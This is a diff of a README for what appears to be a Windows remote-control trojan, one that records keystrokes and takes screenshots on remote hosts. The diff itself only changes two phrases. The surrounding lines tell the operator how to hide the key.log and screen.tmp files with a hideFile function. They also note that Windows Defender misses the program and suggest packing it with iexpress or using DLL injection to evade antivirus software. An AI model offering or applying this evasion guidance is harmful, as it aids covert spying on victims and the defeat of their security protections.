Forec/light-applications/remote-control/README.md

 * **Attention**: If you want to use `remote.exe` under **x64** system, I suggest that you should compile it as x64.

-* Two files will be created under `E:` in remote hosts, I didn't hide these files.
+* Two files will be created under `E:\` in remote hosts, I didn't hide these files.
 You can use the function provided in `trojan.cpp` which definition is `bool hideFile(const char *path)`.
 The two files are `E:\key.log` and `E:\screen.tmp`, which will be created by `remote.exe` when client ask for keyboard record or screenshots. **If you want to hide them, remember to use function `hideFile` to hide `E:\screen.tmp` whenever you ask for screenshot.** Since the new screenshot overrides the past screenshot, but the keyboard record is an append operation.

 * **TO HIDE**: I didn't do anything protecting `remote.exe`, any common anti-virus software like 360 or Avira can easily kill it.
 Good news is the Windows Defender doesn't notice this program.
 To pack the server program, I recommand the `iexpress`, since every Windows system has it as a built-in application, and it's easy, most important.
 However, **packer is not enough for protect this program from anti-virus software.** Instead of packer, you can also use DLL-Injection( only works for Windows lower than Windows7), which is also provided in this repository.
-But, **PLEASE LIMIT YOUR ACTION**.
+But, **PLEASE REMEMBER SELF-DISCIPLINE**.

 ### CLIENT
 * Compile: I put all files needed in folder `client`, if you have Qt Creator, just open `client.pro`, else please build a new project with other IDEs.